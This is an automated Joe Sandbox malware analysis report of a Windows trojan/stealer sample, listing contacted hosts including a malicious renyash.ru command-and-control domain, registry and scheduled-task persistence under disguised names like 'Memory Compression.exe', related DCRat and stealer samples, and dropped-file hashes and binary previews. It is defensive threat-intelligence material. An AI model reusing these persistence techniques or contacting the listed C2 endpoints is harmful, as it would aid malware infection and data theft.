                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUfalse
                                                                                        104.21.38.84
                                                                                        		586580cm.renyash.ruUnited States
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        34.117.59.81
                                                                                        		ipinfo.ioUnited States
                                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                                                                                        Private

                                                                                        IP
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1589185
                                                                                        Start date and time:2025-01-11 15:01:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 33s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:56
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Udzp7lL5ns.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:3614F4C4B137E627F03D0118F4779D52.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winEXE@52/324@3/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 20%
                                                                                        HCA Information:Failed
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.175.87.197
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target ApplicationFrameHost.exe, PID 7056 because it is empty
                                                                                        • Execution Graph export aborted for target Memory Compression.exe, PID 8040 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3920 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6696 because it is empty
                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        09:02:07API Interceptor177x Sleep call for process: powershell.exe modified
                                                                                        09:02:21API Interceptor1145850x Sleep call for process: Memory Compression.exe modified
                                                                                        09:02:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                        15:02:04Task SchedulerRun new task: ApplicationFrameHost path: "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                        15:02:04Task SchedulerRun new task: ApplicationFrameHostA path: "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                        15:02:04Task SchedulerRun new task: LaHYItspByFGQiJUMBgDGadp path: "C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:02:04Task SchedulerRun new task: LaHYItspByFGQiJUMBgDGadpL path: "C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:02:04Task SchedulerRun new task: Memory Compression path: "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:02:05Task SchedulerRun new task: Memory CompressionM path: "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:02:07Task SchedulerRun new task: Udzp7lL5ns path: "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                        15:02:07Task SchedulerRun new task: Udzp7lL5nsU path: "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                        15:02:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:02:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadp "C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:02:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                        15:02:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Udzp7lL5ns "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                        15:02:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:03:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadp "C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:03:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                        15:03:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Udzp7lL5ns "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                        15:03:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:03:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LaHYItspByFGQiJUMBgDGadp "C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:03:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                                                                                        15:03:56AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Udzp7lL5ns "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                        15:04:14AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                        15:04:22AutostartRun: WinLogon Shell "C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:04:31AutostartRun: WinLogon Shell "C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe"
                                                                                        15:04:40AutostartRun: WinLogon Shell "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                              h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            104.21.38.840V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php
                                                                                                            HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 495112cm.renyash.ru/vmLineMultiUniversalwp.php
                                                                                                            eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 250345cm.renyash.ru/sqltemp.php
                                                                                                            GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
                                                                                                            1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 250345cm.renyash.ru/sqltemp.php
                                                                                                            U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                                                            ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                                                            67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                                                            gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ipinfo.io0t8amSU3vd.exeGet hashmaliciousCryptoWall, TrojanRansomBrowse
                                                                                                            • 34.117.59.81
                                                                                                            z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                            • 34.117.59.81
                                                                                                            h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                            • 34.117.59.81
                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            DownloadedMessage.zipGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 34.117.59.81
                                                                                                            Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.59.81
                                                                                                            eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 34.117.59.81
                                                                                                            api.telegram.orgnfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                            • 149.154.167.220
                                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRUnfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                            • 149.154.167.220
                                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSSDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.64.1
                                                                                                            QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.41.74
                                                                                                            qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.186.192
                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.76.57
                                                                                                            kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 104.26.13.205
                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.16.1
                                                                                                            bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.38.192
                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 104.21.16.1
                                                                                                            xaqnaB0rcW.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.54.126
                                                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                            • 34.117.112.1
                                                                                                            0t8amSU3vd.exeGet hashmaliciousCryptoWall, TrojanRansomBrowse
                                                                                                            • 34.117.59.81
                                                                                                            https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                                                                            • 34.117.77.79
                                                                                                            z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                            • 34.117.59.81
                                                                                                            h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                            • 34.117.59.81
                                                                                                            mail (4).emlGet hashmaliciousUnknownBrowse
                                                                                                            • 34.67.241.53
                                                                                                            https://link.edgepilot.com/s/692fcd16/rcPy0yXyykq_mRLKroUvRQ?u=https://petroleumalliance.us8.list-manage.com/track/click?u=325f73d29a0b4f85a46b700a9%26id=dfe369da82%26e=94c2db4428Get hashmaliciousUnknownBrowse
                                                                                                            • 34.66.73.214
                                                                                                            https://link.hawkmarketplace.com/ls/click?upn=u001.NRX3OcAfcLfHWEd5qsjyzM6WT-2BF1VD5Gk5YbgIAYbY5U3l7YahZ9jFJiEbbS6IhBN6yYvKFeVvnzAjGEnyANBjGf6UhHhAeaI0f24bn3m8M-3DHEd8_ZxwDPev-2F4SWtaU7KVH4NQ3q5LCEea7ZiHXCgQiJrQ1jpoX7NCWIIGJClL-2BqW9-2BJ8dhfmmFfj6cPRkRgADgKcmt3XMWLYM3V7MFiCh8f014GFwkmQ3GEzOC8nL-2BOxe3qWJqB7aoQU5RKRMsfFPXsD4Zt-2Be2oroYIyJDNmWjUgDL5V7HAKgE194R1-2BYTOA6UadnB-2FMyPfxgtmNoA5XpjrfVAH50OiGYNfFIK-2F3aJ5rCoUYWz1YP18RYPxsUE9LavCbXpafbb24UXsSHjwy4rPeclHJt3tNf2SAVjBLt6j7rlUrDpc3-2FqO9y7WD1ZBsqXtnpWCQhDSZ924UU9le6tPESMTqmtxKUOlruY-2BzVXGgyEvtnAUlLXOuCct0jL2Du4cgr0gUZ2V-2FfH6mPhOS9rs7fW3nY-2FbFGnNg1OqISBN1rIMOcLsr0O1MZyLDfxW27bhudEr6njYPINhVMCgwtlalj6XYRz7b9SyPGHlBY6Ci2Gbcn32cL5aslGjCqtVDYGHKsFYo5jaIEPqGYISgsJiaPqmpFC8dLiEIvRcdJBMMJoPxX-2FIBBQmmC4f74WRmIvwdnghIavPV0ZvqAzKpaGndN-2BsJcX2FpWDJRu9rt0-2FX59eoGfPXYZU0Tgei5bwv2gDdKWDu6M2QuCLBM4IHa3a3HRauswtESBoBdu5v-2FJ04VJjlz8k9284YG4Cr9-2FyMDn6AwFh-2F5XNnMyOmiOrisCfxpaqbhpCj1BIF-2BOzhIy1rwY-2FA0CSTyLka9O73zS4Gp-2BIvyZEGNN-2BpDFcLQJEjSzBA993huIFGUPbuHdJ-2F-2FcF7i2mw6MAVMpzgEQkaPauPql95zvuXNqRkHqLXiZ-2Fl3p7k-2BjfBVJ-2FGwneL-2BhXZ8E4jTuza6Nmx10cRzpLfBicvf-2Bn3i9nrdUmzWjTe4MiNSNOTdym0BUPGe2fvFPQ-2FHsCyV5Y8T43YQb7sWM-2F11jhxMbvHfEffa-2FXAHokMr-2BhY23oqCQI1sD7nPmUzvqfqW0mMUmujg2hgXqoowzSalOUFi3se0F-2F50iXpiCygHyk5DP-2Bn-2BQ-3D-3DGet hashmaliciousHtmlDropperBrowse
                                                                                                            • 34.67.241.53

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ec2.htaGet hashmaliciousRemcosBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81
                                                                                                            JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            • 34.117.59.81

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\Desktop\BQKoNvFu.logloader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                        Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                              HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:MSVC .res
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1168
                                                                                                                                Entropy (8bit):4.448520842480604
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                                MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                                SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                                SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                                SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4608
                                                                                                                                Entropy (8bit):3.921744630019207
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:6OmhtgWxZ8RxeOAkFJOcV4MKe28dMdEd87vqBH7uulB+hnqXSfbNtm:cCXxvxVx9ivktTkZzNt
                                                                                                                                MD5:3FBDEF7222A92C663D8CD645945B9B55
                                                                                                                                SHA1:58983FDB15D5F751D4E52497FEC60B6DC4FC309B
                                                                                                                                SHA-256:76F4CBE5F5FBD519966BFD8E21D0E904AD215C88C92078F340BD9817852A40E6
                                                                                                                                SHA-512:32E3F28FEF68AAC3E599C51FBBFB69D94BD51746442C235157B7F548ADF8A8061C7258F9DCA516BACA760B0D61AA2BA5F9F8455B2B17AD131B44F8411B891D16
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...(... ...#Blob...........WU........%3................................................................

                                                                                                                                C:\Program Files (x86)\Windows Mail\1a5d5b8dcee3d8

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:ASCII text, with very long lines (497), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):497
                                                                                                                                Entropy (8bit):5.861381354278938
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:IkBGxIBmvJS1hc/oOdvUt0fRmXlt+4cdftAeEb9n/o5amMtMvaKvI/zO1xZP/03e:IkcxcS01h1w8GfRmVQftopo8Ic/q03ry
                                                                                                                                MD5:411502CBD1A6B181A653AB389DEB1B69
                                                                                                                                SHA1:0E75BFB4102AC7C654171016229DFAF54A582DD7
                                                                                                                                SHA-256:D2724C8CEB2ABC8E665032C6D4E63A28D7E40F068F8A728026D11F7C928948FA
                                                                                                                                SHA-512:0EB784E5D108FC30D8CF5637BF7EF3CC57C5E9075A922491EE9DF596933346A098DCAA2FD63939689C555EB628BB15222910FC1EEF353156F765093F194FF8E1
                                                                                                                                Malicious:false
                                                                                                                                Preview:TVHjwpA9WRd6cN9TjS5RpzpG9Lycanwt4grEhgKfjipiy1eEX7zEuHydqBjl1hitfuB6f4vCIarHKGRHquEdxr8xrNYg6ioB95DE0iicMw6UZqTkuc4HdF5xwNOSgPGjvqHOCMRILlQBunXA4yvdohi49QSmTQ67pXjtiEhhKv51y4CI0OXsdm4OHNOw4pz5pTWXEnbzQOT2lrGFNKvE2NeCcVmV0vnf6ALehpDNwicOTBmaGJit3uCczT4tBG9ekx6lgmhiGiSTuPsasMOqN3lL7soOuULqj8nfFA4el9nVcssjldAz1SQrLvox7TywWluwlMVsRuFNPQtOAEnQTWzQr6UUWGhRL180858YIShHMDb4BZw2qhdAwdEp2AWKMxCYS2QEGOHBysDoeZS6UpknX8Ee1SfH6W4YBCmJJrvbZbLEZaLdsZ0hNYBUyvNytAEcxpncwIxm3IN6w9FaHCZgfWLmBSVXd6sZWtQuxsqjlNnEK

                                                                                                                                C:\Program Files (x86)\Windows Mail\Memory Compression.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1933824
                                                                                                                                Entropy (8bit):7.542672428749591
                                                                                                                                Encrypted:false
